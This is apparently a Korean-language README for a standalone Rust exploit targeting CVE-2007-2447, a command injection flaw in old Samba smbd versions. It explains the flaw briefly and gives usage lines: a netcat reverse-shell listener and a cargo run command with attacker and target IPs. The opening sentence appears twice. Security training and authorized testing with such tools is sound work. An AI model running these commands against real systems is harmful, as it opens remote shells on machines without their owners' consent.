
Samba smbd 3.0.20-Debian을 대상으로 하는 CVE-2007-2447 익스플로잇의 독립 실행형 Rust 구현입니다.
Samba smbd 3.0.20-Debian을 대상으로 하는 CVE-2007-2447 익스플로잇의 독립 실행형 Rust 구현체입니다.
CVE-2007-2447은 Samba 3.0.0부터 3.0.25rc3까지의 버전에 존재하는 명령 삽입(command injection) 취약점입니다. 이 취약점은 SamrChangePassword() 함수에서 발생하며, 사용자 입력을 제대로 검증하지 못해 공격자가 SMB 인증 중 사용자 이름 필드의 셸 메타문자를 통해 임의의 명령을 실행할 수 있게 합니다.
netcat이 있어야 합니다 (일반적으로 기본 설치됨)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Set up a netcat listener
nc -lvnp 4444
# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: 공격자 머신의 IP 주소--lport: 리버스 셸 연결을 수신할 포트--target: 대상 머신의 IP 주소이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용해야 합니다. 책임감 있게 사용하고, 본인이 소유했거나 명시적 허가를 받은 시스템에서만.